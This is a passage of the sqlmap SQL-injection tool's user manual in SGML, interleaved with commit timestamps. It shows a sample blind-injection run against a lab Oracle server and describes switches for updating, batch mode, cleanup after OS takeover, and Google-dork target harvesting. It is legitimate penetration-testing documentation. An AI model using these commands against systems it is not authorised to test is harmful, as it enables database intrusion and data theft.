used to retrieve the output is any of the blind SQL injection types.
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Example against an Oracle target affected only by boolean-based blind SQL
injection:
2008-10-15 19:38:22 +04:00
<tscreen><verb>
2011-02-27 15:19:32 +03:00
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
2008-10-15 19:38:22 +04:00
[...]
2011-02-27 15:19:32 +03:00
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========> ] 11/64 ETA 00:19
2008-10-15 19:38:22 +04:00
</verb></tscreen>
<p>
2011-02-27 15:19:32 +03:00
Then:
2008-10-15 19:38:22 +04:00
<tscreen><verb>
2011-02-27 15:19:32 +03:00
100% [===================================================] 64/64
[10:28:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
2008-10-15 19:38:22 +04:00
</verb></tscreen>
<p>
As you can see, sqlmap first calculates the length of the query output,
2010-02-08 12:10:32 +03:00
then estimates the time of arrival, shows the progress in percentage and
2011-02-27 15:19:32 +03:00
counts the number of retrieved output characters.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Update sqlmap
2010-03-02 15:07:54 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-update</tt>
2010-03-05 17:06:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
Using this option you can update the tool to the latest development
version directly from the subversion repository. You obviously need
Internet access.
2010-03-05 17:06:03 +03:00
<p>
2011-02-28 18:23:05 +03:00
If, for any reason, this operation fails, run <tt>svn update</tt> from
your sqlmap working copy. It will perform the exact same operation of
switch <tt>-</tt><tt>-update</tt>.
2011-02-27 15:19:32 +03:00
If you are running sqlmap on Windows, you can use the TartoiseSVN client
2011-02-28 18:23:05 +03:00
by right-clicking in Windows Explorer into your sqlmap working copy and
clicking on <tt>Update</tt>.
<p>
This is strongly recommended <bf>before</bf> reporting any bug to the
<htmlurl name="mailing lists" url="http://sqlmap.sourceforge.net/#ml">.
2010-03-02 15:07:54 +03:00
2011-02-27 15:19:32 +03:00
<sect2>Save options in a configuration INI file
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-save</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to save the command line options to a configuration INI
file.
The generated file can then be edited and passed to sqlmap with the
<tt>-c</tt> option as explained above.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Act in non-interactive mode
2008-10-15 19:38:22 +04:00
2010-03-12 20:43:38 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-batch</tt>
2010-03-12 20:43:38 +03:00
2011-02-27 15:19:32 +03:00
<p>
If you want sqlmap to run as a batch tool, without any user's interaction
when sqlmap requires it, you can force that by using
<tt>-</tt><tt>-batch</tt> switch. This will leave sqlmap to go with a
default behaviour whenever user's input would be required.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect1>Miscellaneous
<sect2>TODO
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-beep</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
TODO
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>TODO
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-check-payload</tt>
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<p>
TODO
<sect2>Cleanup the DBMS from sqlmap specific UDF(s) and table(s)
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-cleanup</tt>
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<p>
It is recommended to clean up the back-end database management system from
sqlmap temporary table(s) and created user-defined function(s) when you
are done taking over the underlying operating system or file system.
Switch <tt>-</tt><tt>-cleanup</tt> will attempt to clean up the DBMS and
the file system wherever possible.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>TODO
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<p>
Switch: <tt>-</tt><tt>-forms</tt>
2008-10-20 17:43:18 +04:00
<p>
2011-02-27 15:19:32 +03:00
TODO
<sect2>Use Google dork results from specified page number
2008-10-20 17:43:18 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-gpage</tt>
2008-10-20 17:43:18 +04:00
<p>
2011-02-27 15:19:32 +03:00
Default sqlmap behavior with option <tt>-g</tt> is to do a Google
search and use the first 100 resulting URLs for further SQL injection
testing. However, in combination with this option you can specify with
this switch, <tt>-</tt><tt>-gpage</tt>, some page other than the first one
to retrieve target URLs from.
2008-10-20 17:43:18 +04:00
2011-02-27 15:19:32 +03:00
<sect2>TODO
<p>
Switch: <tt>-</tt><tt>-parse-errors</tt>
2008-10-20 17:43:18 +04:00
<p>
2011-02-27 15:19:32 +03:00
TODO
2008-10-20 17:43:18 +04:00
2011-02-27 15:19:32 +03:00
<sect2>TODO
2009-04-22 15:48:07 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-replicate</tt>
2009-04-22 15:48:07 +04:00
<p>
2011-02-27 15:19:32 +03:00
TODO
2009-07-25 18:31:44 +04:00
2011-02-27 15:19:32 +03:00
<sect>License and copyright
2009-07-25 18:31:44 +04:00
2011-02-27 15:19:32 +03:00
<p>
sqlmap is released under the terms of the
<htmlurl url="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html" name="General Public License v2">.
sqlmap is copyrighted by its <htmlurl url="http://sqlmap.sourceforge.net/#developers" name="developers">.
2009-04-22 15:48:07 +04:00
2008-10-15 19:38:22 +04:00
<sect>Disclaimer
<p>
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
<p>
2010-03-02 15:07:54 +03:00
Whatever you do with this tool is uniquely your responsibility. If you are
2008-10-15 19:38:22 +04:00
not authorized to punch holes in the network you are attacking be aware
that such action might get you in trouble with a lot of law enforcement
agencies.
2010-03-02 15:07:54 +03:00
<sect>Authors
2008-10-15 19:38:22 +04:00
<p>
2009-04-22 15:48:07 +04:00
<htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G."> (inquis) - Lead developer.
PGP Key ID: <htmlurl url="http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x05F5A30F" name="0x05F5A30F">
2008-10-15 19:38:22 +04:00
2010-03-02 15:07:54 +03:00
<htmlurl url="mailto:miroslav.stampar@gmail.com" name="Miroslav Stampar"> (stamparm) - Developer.
PGP Key ID: <htmlurl url="http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xB5397B1B" name="0xB5397B1B">
2008-10-15 19:38:22 +04:00
</article>